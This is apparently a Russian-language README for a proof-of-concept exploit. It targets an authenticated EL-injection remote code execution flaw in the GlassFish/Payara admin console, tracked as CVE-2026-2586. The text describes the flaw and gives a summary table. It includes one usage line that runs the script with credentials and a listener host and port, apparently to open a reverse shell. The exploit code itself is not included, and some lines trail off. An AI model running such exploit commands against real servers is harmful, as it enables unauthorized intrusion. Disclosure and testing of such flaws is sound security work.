
Аутентифицированный эксплойт EL-инъекции для административной консоли GlassFish/Payara, позволяющий выполнять удаленные команды через специально сформированные параметры в процессе настройки виртуального сервера.
Уязвимость инъекции выражений EL в консоли администрирования GlassFish позволяет аутентифицированному пользователю внедрять вредоносные EL-выражения в параметры, обрабатываемые административным веб-интерфейсом. Успешная эксплуатация может привести к удаленному выполнению команд на затронутом сервере.
Уязвимость была обнаружена в процессе редактирования виртуальной конфигурации сервера, где контролируемые пользователем параметры небезопасно интерпретируются приложением.
Это происходит из-за того, что:
| - | - | | Продукт: | GlassFish / Payara Консоль администрирования | | CVE: | CVE-2026-2586 | | Тип: | Инъекция выражений EL | | Воздействие: | Аутентифицированное удаленное выполнение кода | | Вектор: | Административный веб-интерфейс |
Тест был выполнен в локальной и контролируемой среде.
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure
Уязвимый URL:
ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ИСПОЛЬЗОВАНИЯ. DeepSecurity Perú не одобряет несанкционированный доступ и не несет ответственности за любое неправомерное использование предоставленной информации.